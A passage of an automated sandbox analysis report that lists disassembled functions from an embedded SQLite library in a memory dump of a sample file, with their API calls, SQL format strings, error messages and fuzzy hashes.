                                                                                      • SI1c7a7970970b9619.SQLITE.INTEROP(PRAGMA '%q'.table_info('%q'),?,?,?,?,00000000), ref: 6C41EFAC
                                                                                      • SI1c7a7970970b9619.SQLITE.INTEROP(SELECT 0, 'tbl', '', 0, '', 1 UNION ALL SELECT 1, 'idx', '', 0, '', 2 UNION ALL SELECT 2, 'stat', '', 0, '', 0,?,?,?,?,?,?,?,?,00000000), ref: 6C41F02C
                                                                                      • SI1c7a7970970b9619.SQLITE.INTEROP(6C4F7DBC,?,?,?,?,?,?,?,?,00000000), ref: 6C41F043
                                                                                        • Part of subcall function 6C477A30: SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00020832,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe,?,?,?,?,?,6C40EF31,?,00000080,00000000,?,?), ref: 6C477B29
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(00000000,?,?,?,?,?,?,?,00000000), ref: 6C41F0A0
                                                                                      • SI9c6d7cd7b7d38055.SQLITE.INTEROP(00000000,?,?,?,?,?,?,?,?,00000000), ref: 6C41F0F4
                                                                                      • SId99ac2a61d035e11.SQLITE.INTEROP(00000000,00000001,?,?,?,?,?,?,?,?,?,00000000), ref: 6C41F106
                                                                                      • SI9c6d7cd7b7d38055.SQLITE.INTEROP(00000000,00000000,00000001,?,?,?,?,?,?,?,?,?,00000000), ref: 6C41F114
                                                                                      • SI9c6d7cd7b7d38055.SQLITE.INTEROP(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C41F1CA
                                                                                      • SId99ac2a61d035e11.SQLITE.INTEROP(00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C41F1E3
                                                                                      • SIbff6307869d58daf.SQLITE.INTEROP(00000000,00000005), ref: 6C41F217
                                                                                      • SI9c6d7cd7b7d38055.SQLITE.INTEROP(00000000,00000000,00000005), ref: 6C41F224
                                                                                      Strings
                                                                                      • PRAGMA '%q'.table_info('%q'), xrefs: 6C41EFA7
                                                                                      • SELECT 0, 'tbl', '', 0, '', 1 UNION ALL SELECT 1, 'idx', '', 0, '', 2 UNION ALL SELECT 2, 'stat', '', 0, '', 0, xrefs: 6C41F027
                                                                                      • sqlite_stat1, xrefs: 6C41F000
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I9c6d7cd7b7d38055.$I1c7a7970970b9619.$Id99ac2a61d035e11.$I950480ab972e108d.Ibff6307869d58daf.Ifc350ae509dc2b53.
                                                                                      • String ID: PRAGMA '%q'.table_info('%q')$SELECT 0, 'tbl', '', 0, '', 1 UNION ALL SELECT 1, 'idx', '', 0, '', 2 UNION ALL SELECT 2, 'stat', '', 0, '', 0$sqlite_stat1
                                                                                      • API String ID: 4210765592-3059532742
                                                                                      • Opcode ID: cf04c1e6d991518a3b5d8204f9420e8ec040f81ca77b71c16e50fcd02a0010b9
                                                                                      • Instruction ID: 2d89778d8746dee63b4d5a8a5d59113456f8176eb5483e763a9b4e681f94df4e
                                                                                      • Opcode Fuzzy Hash: cf04c1e6d991518a3b5d8204f9420e8ec040f81ca77b71c16e50fcd02a0010b9
                                                                                      • Instruction Fuzzy Hash: 5C919DB5A052059FEB01CF59DC80FEEB7B4EF45318F100169EC19ABB40E775A9168BE1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C408DF0 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 217COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SIf356c1132676af25.SQLITE.INTEROP(00000000,00000000,?,00000000,?), ref: 6C408EAD
                                                                                      • SIf356c1132676af25.SQLITE.INTEROP(00000000,00000000,?,00000000,?), ref: 6C408EEF
                                                                                      • SIf356c1132676af25.SQLITE.INTEROP(00000000,00000000,?,00000000,?), ref: 6C408F3D
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(?,?,?,00000000,00000000,?,00000000,?), ref: 6C408FFB
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(?,?,?,?,00000000,00000000,?,00000000,?), ref: 6C409006
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: If356c1132676af25.$Ifc350ae509dc2b53.
                                                                                      • String ID: automerge$crisismerge$hashsize$pgsz$rank$usermerge
                                                                                      • API String ID: 811496679-4069215817
                                                                                      • Opcode ID: 0298dfe5e24b378cbf06082b5a90e5472626aa7d7fecdc2139942d3e1b4b461b
                                                                                      • Instruction ID: 1c3ccf4f0da13a9030878649acac6be63295a345de859c980a076e673547ca40
                                                                                      • Opcode Fuzzy Hash: 0298dfe5e24b378cbf06082b5a90e5472626aa7d7fecdc2139942d3e1b4b461b
                                                                                      • Instruction Fuzzy Hash: 34511372B455214BDB04DB2AAC40EDEB3A5EF9525DB04067EED09DBF00E723E91983D2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C436930 Relevance: 21.2, APIs: 4, Strings: 8, Instructions: 159COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI1c7a7970970b9619.SQLITE.INTEROP(INSERT INTO %Q.'%q_content' VALUES(%s),00000000,?,6C4FF2F8,?,?,00000000), ref: 6C436ACA
                                                                                        • Part of subcall function 6C477A30: SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00020832,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe,?,?,?,?,?,6C40EF31,?,00000080,00000000,?,?), ref: 6C477B29
                                                                                      • SI1c7a7970970b9619.SQLITE.INTEROP(SELECT %s WHERE rowid=?,6C4FF378,?,?,00000000), ref: 6C436AE7
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(?,?,?,?,?,?,?,?,00000000), ref: 6C436B3E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I1c7a7970970b9619.$I950480ab972e108d.Ifc350ae509dc2b53.
                                                                                      • String ID: (Ol$8Ol$INSERT INTO %Q.'%q_content' VALUES(%s)$SELECT %s WHERE rowid=?$TOl$lOl$pOl$Ol
                                                                                      • API String ID: 2133004299-2744215727
                                                                                      • Opcode ID: e179c3398efb122c146a64a768e8db20573fcc9eaf257fc1f79bba250eeeede7
                                                                                      • Instruction ID: eabd15d3f22879b9de08213fb15b6a0a7900ce9251bfc7b1dd1f8e72395bdc3a
                                                                                      • Opcode Fuzzy Hash: e179c3398efb122c146a64a768e8db20573fcc9eaf257fc1f79bba250eeeede7
                                                                                      • Instruction Fuzzy Hash: B77159729012298BEB10CF95D882FDEFBB1FB8A304F51419CD428ABB21D7305A46CF95
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C434460 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 151COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 6C436930: SI1c7a7970970b9619.SQLITE.INTEROP(INSERT INTO %Q.'%q_content' VALUES(%s),00000000,?,6C4FF2F8,?,?,00000000), ref: 6C436ACA
                                                                                      • SI46481015c7f49c68.SQLITE.INTEROP(?,00000001,00000000,?,00000000,?,?,?,?,?,6C4321F1,?,?,?), ref: 6C434497
                                                                                      • SI46481015c7f49c68.SQLITE.INTEROP(?,00000002,6C4321F1,?,?,00000001,00000000,?,00000000,?,?,?,?,?,6C4321F1,?), ref: 6C4344A4
                                                                                      • SI46481015c7f49c68.SQLITE.INTEROP(?,00000003,00000000,00000001,?,00000002,6C4321F1,?,?,00000001,00000000,?,00000000,?), ref: 6C4344B2
                                                                                      • SI46481015c7f49c68.SQLITE.INTEROP(?,00000004,?,?,?,00000003,00000000,00000001,?,00000002,6C4321F1,?,?,00000001,00000000,?), ref: 6C4344C0
                                                                                      • SI46481015c7f49c68.SQLITE.INTEROP(?,00000005,?,?), ref: 6C4344DD
                                                                                      • SI1c7a7970970b9619.SQLITE.INTEROP(%lld %lld,?,?,?,?), ref: 6C4344F4
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00015025,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe), ref: 6C434544
                                                                                      • SI9c6d7cd7b7d38055.SQLITE.INTEROP(?), ref: 6C4345AE
                                                                                      Strings
                                                                                      • %s at line %d of [%.10s], xrefs: 6C43453D
                                                                                      • misuse, xrefs: 6C434538
                                                                                      • %lld %lld, xrefs: 6C4344EF
                                                                                      • b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe, xrefs: 6C43452E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I46481015c7f49c68.$I1c7a7970970b9619.$I950480ab972e108d.I9c6d7cd7b7d38055.
                                                                                      • String ID: %lld %lld$%s at line %d of [%.10s]$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$misuse
                                                                                      • API String ID: 1918803548-706791455
                                                                                      • Opcode ID: 9f4c6351d351eec4accac024125a6cefa0f6c7cc870030d619b723fdd5f22fc6
                                                                                      • Instruction ID: 8829bc85228364348463b39a476735aae5a0585e4270aed6c7c40d9de412e19d
                                                                                      • Opcode Fuzzy Hash: 9f4c6351d351eec4accac024125a6cefa0f6c7cc870030d619b723fdd5f22fc6
                                                                                      • Instruction Fuzzy Hash: 6E412775B001102BEB01DE599C00FEB376ADFC93A9F141528FA18A7780EB32D91587F1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C43E930 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 138COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI1c7a7970970b9619.SQLITE.INTEROP(illegal first argument to %s,snippet), ref: 6C43E9B2
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(00000000,000000FF,000000FF,00000001,000000FF,illegal first argument to %s,snippet), ref: 6C43E9D5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I1c7a7970970b9619.Ifc350ae509dc2b53.
                                                                                      • String ID: </b>$<b>$fts3cursor$illegal first argument to %s$snippet$wrong number of arguments to function snippet()
                                                                                      • API String ID: 1339256467-2803590325
                                                                                      • Opcode ID: 04097a42567dfff525999371d0e57a6550062de1100237f698da334b8cc5ce47
                                                                                      • Instruction ID: c859c9c05b45a8f61ed31453a3468414d18fdf5825ae8665425c64c1b9e7ee8a
                                                                                      • Opcode Fuzzy Hash: 04097a42567dfff525999371d0e57a6550062de1100237f698da334b8cc5ce47
                                                                                      • Instruction Fuzzy Hash: 6441E472A042155BDB10EE19EC41D9ABBA1EBC1239F14077DEC3857BD0E732991987E2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C4ACB60 Relevance: 19.5, APIs: 2, Strings: 9, Instructions: 232COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: %s at line %d of [%.10s]$abort due to ROLLBACK$another row available$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$database corruption$gfff$no more rows available$statement aborts at %d: [%s] %s$unknown error
                                                                                      • API String ID: 0-775950135
                                                                                      • Opcode ID: 9557e6a700a24b1f49c56e3bb51a28c6964f2cc68d0db5109cf8085cf66e2cd9
                                                                                      • Instruction ID: 422b440d3d92dccb17097e5682af5dbff3e4384f7cf995db39f3a1f3eb0d1c16
                                                                                      • Opcode Fuzzy Hash: 9557e6a700a24b1f49c56e3bb51a28c6964f2cc68d0db5109cf8085cf66e2cd9
                                                                                      • Instruction Fuzzy Hash: 4391E570E012159FDB24CF69C988FD9BBB1BF49309F204269C518ABB81CF35A945CFA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C3EA120 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 178COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SIca6f27da046939cc.SQLITE.INTEROP(?,1st argument to percentile() is not numeric,000000FF), ref: 6C3EA248
                                                                                      • SI863e1ae0679961f5.SQLITE.INTEROP(?), ref: 6C3EA258
                                                                                      • SIca6f27da046939cc.SQLITE.INTEROP(?,Inf input to percentile(),000000FF), ref: 6C3EA27B
                                                                                      • SI4bf5a93645714882.SQLITE.INTEROP(?,00000000,00000000), ref: 6C3EA2A5
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(?), ref: 6C3EA2B4
                                                                                      • SI943321d364f02e5d.SQLITE.INTEROP(?), ref: 6C3EA2C8
                                                                                      • SIca6f27da046939cc.SQLITE.INTEROP(?,2nd argument to percentile() is not the same for all input rows,000000FF), ref: 6C3EA2FF
                                                                                      Strings
                                                                                      • 1st argument to percentile() is not numeric, xrefs: 6C3EA242
                                                                                      • 2nd argument to percentile() is not a number between 0.0 and 100.0, xrefs: 6C3EA311
                                                                                      • Inf input to percentile(), xrefs: 6C3EA275
                                                                                      • 2nd argument to percentile() is not the same for all input rows, xrefs: 6C3EA2F9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: Ica6f27da046939cc.$I4bf5a93645714882.I863e1ae0679961f5.I943321d364f02e5d.Ifc350ae509dc2b53.
                                                                                      • String ID: 1st argument to percentile() is not numeric$2nd argument to percentile() is not a number between 0.0 and 100.0$2nd argument to percentile() is not the same for all input rows$Inf input to percentile()
                                                                                      • API String ID: 793364336-2567114664
                                                                                      • Opcode ID: 20fc378b8bf160eccc29952b668708b73c68bbcd138d4584fe279c87b92e63fb
                                                                                      • Instruction ID: fd6e32881a9e84227d20f9fa1976241a8a62525b39e94839807485b651b52009
                                                                                      • Opcode Fuzzy Hash: 20fc378b8bf160eccc29952b668708b73c68bbcd138d4584fe279c87b92e63fb
                                                                                      • Instruction Fuzzy Hash: 19518A32A0471487C611DE39EC80A66B771EF8A328F20475BEC69B6A91EB33D495C7D1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C424670 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 123COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI1c7a7970970b9619.SQLITE.INTEROP(SELECT * FROM %Q.%Q,?,?,?,?,?,?,?,?,?,6C4244C2), ref: 6C424691
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(00000000,?,?,?,?,?,?,?,6C4244C2), ref: 6C4246CA
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00014F4C,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe,?,?,?,?,?,?,?,?,6C4244C2), ref: 6C4246FF
                                                                                      • SI1c7a7970970b9619.SQLITE.INTEROP(UNIQUE constraint failed: %s.%s,?,00000000,?,?,?,?,?,?,?,?,6C4244C2), ref: 6C424770
                                                                                        • Part of subcall function 6C477A30: SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00020832,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe,?,?,?,?,?,6C40EF31,?,00000080,00000000,?,?), ref: 6C477B29
                                                                                      • SI1c7a7970970b9619.SQLITE.INTEROP(rtree constraint failed: %s.(%s<=%s),?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?), ref: 6C4247A5
                                                                                      Strings
                                                                                      • %s at line %d of [%.10s], xrefs: 6C4246F8
                                                                                      • rtree constraint failed: %s.(%s<=%s), xrefs: 6C4247A0
                                                                                      • misuse, xrefs: 6C4246F3
                                                                                      • SELECT * FROM %Q.%Q, xrefs: 6C42468C
                                                                                      • b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe, xrefs: 6C4246E9
                                                                                      • UNIQUE constraint failed: %s.%s, xrefs: 6C42476B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I1c7a7970970b9619.$I950480ab972e108d.$Ifc350ae509dc2b53.
                                                                                      • String ID: %s at line %d of [%.10s]$SELECT * FROM %Q.%Q$UNIQUE constraint failed: %s.%s$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$misuse$rtree constraint failed: %s.(%s<=%s)
                                                                                      • API String ID: 1209601779-607827080
                                                                                      • Opcode ID: c8dffdbf1a91a017aaef46bccbdcb724693018a13cc545bbeff786da2e732686
                                                                                      • Instruction ID: c665faba3ad59f8a79d9a1ec90c44290e2f39b9464ed08ee1d8944e99c51cde0
                                                                                      • Opcode Fuzzy Hash: c8dffdbf1a91a017aaef46bccbdcb724693018a13cc545bbeff786da2e732686
                                                                                      • Instruction Fuzzy Hash: 5B41E670E002046BEB04DBA59C41F6FB7B5EF89348F14456DE865E7B41EB34E9048BD1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C43E7C0 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 89COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI1c7a7970970b9619.SQLITE.INTEROP(illegal first argument to %s,optimize), ref: 6C43E7E8
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(00000000,000000FF,000000FF,00000001), ref: 6C43E80B
                                                                                      • SI633e1c91fb9a8aa1.SQLITE.INTEROP(?,00000000), ref: 6C43E82C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I1c7a7970970b9619.I633e1c91fb9a8aa1.Ifc350ae509dc2b53.
                                                                                      • String ID: Index already optimal$Index optimized$fts3cursor$illegal first argument to %s$optimize$string or blob too big
                                                                                      • API String ID: 234322358-850155063
                                                                                      • Opcode ID: 8482001d7de240568b3b6abea00e147af30357aeff610c08270e7d267f63c931
                                                                                      • Instruction ID: 26e890a7a318b34cb00666192c83dc6e1aae7918f86651250dc418f2a42399b6
                                                                                      • Opcode Fuzzy Hash: 8482001d7de240568b3b6abea00e147af30357aeff610c08270e7d267f63c931
                                                                                      • Instruction Fuzzy Hash: CF210331D1512427DE20EE1CAC41FA937598B4533DF3403A9FC3CABBD1EA22A91581E2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C420F00 Relevance: 18.2, APIs: 12, Instructions: 181COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI9196a02c851acbfb.SQLITE.INTEROP(?,?,000000FF,000000FF), ref: 6C420F2B
                                                                                      • SI9196a02c851acbfb.SQLITE.INTEROP(000000FF,?,000000FF,000000FF), ref: 6C420F54
                                                                                      • SI1527d54f96ad891e.SQLITE.INTEROP(?,?), ref: 6C420F78
                                                                                      • SI9196a02c851acbfb.SQLITE.INTEROP(?,?,000000FF,00000000), ref: 6C420FBB
                                                                                      • SIcd6b4ac0aeff7202.SQLITE.INTEROP(?,?), ref: 6C420FD6
                                                                                      • SIcd6b4ac0aeff7202.SQLITE.INTEROP(?,?), ref: 6C420FF1
                                                                                      • SIcd6b4ac0aeff7202.SQLITE.INTEROP(?,?), ref: 6C42100C
                                                                                      • SIcd6b4ac0aeff7202.SQLITE.INTEROP(?,?), ref: 6C421027
                                                                                      • SI1527d54f96ad891e.SQLITE.INTEROP(?,?,?), ref: 6C421052
                                                                                      • SIcd6b4ac0aeff7202.SQLITE.INTEROP(?,?), ref: 6C42106D
                                                                                      • SI9196a02c851acbfb.SQLITE.INTEROP(?,?,000000FF,00000000), ref: 6C421097
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: Icd6b4ac0aeff7202.$I9196a02c851acbfb.$I1527d54f96ad891e.
                                                                                      • String ID:
                                                                                      • API String ID: 3257529117-0
                                                                                      • Opcode ID: 40cda1c1670f22e15629cab80c609df32a56d122675a5d7819716b82726207e1
                                                                                      • Instruction ID: 26b5db6f344384439b8b5cd61d844127911409e6ea1067726162c33cb9045eea
                                                                                      • Opcode Fuzzy Hash: 40cda1c1670f22e15629cab80c609df32a56d122675a5d7819716b82726207e1
                                                                                      • Instruction Fuzzy Hash: AA5154726140086FDB01EF68EC05EE977E5DB05229F1882E5FD1CCBB61E77299609BC1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C42E010 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 343COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 6C436930: SI1c7a7970970b9619.SQLITE.INTEROP(INSERT INTO %Q.'%q_content' VALUES(%s),00000000,?,6C4FF2F8,?,?,00000000), ref: 6C436ACA
                                                                                      • SI46481015c7f49c68.SQLITE.INTEROP(?,00000001,?,?,?,00000000), ref: 6C42E06F
                                                                                      • SI46481015c7f49c68.SQLITE.INTEROP(?,00000002,?,?,?,00000001,?,?,?,00000000), ref: 6C42E080
                                                                                      • SI9c6d7cd7b7d38055.SQLITE.INTEROP(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C42E099
                                                                                        • Part of subcall function 6C4B57B0: SI950480ab972e108d.SQLITE.INTEROP(00000015,API called with NULL prepared statement,?,00000000,00000000,?,6C47D2D6,?,?,?,00000000,00000000,?), ref: 6C4B57CC
                                                                                        • Part of subcall function 6C4B57B0: SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00014D90,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe,?,00000000,00000000,?,6C47D2D6,?,?,?,00000000,00000000,?), ref: 6C4B580C
                                                                                      • SIbff6307869d58daf.SQLITE.INTEROP(?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C42E0A9
                                                                                      • SI1c7a7970970b9619.SQLITE.INTEROP(SELECT %s,?), ref: 6C42E12F
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(00000000), ref: 6C42E179
                                                                                      • SI9c6d7cd7b7d38055.SQLITE.INTEROP(?), ref: 6C42E1A2
                                                                                      • SIbff6307869d58daf.SQLITE.INTEROP(?,?), ref: 6C42E24A
                                                                                      Strings
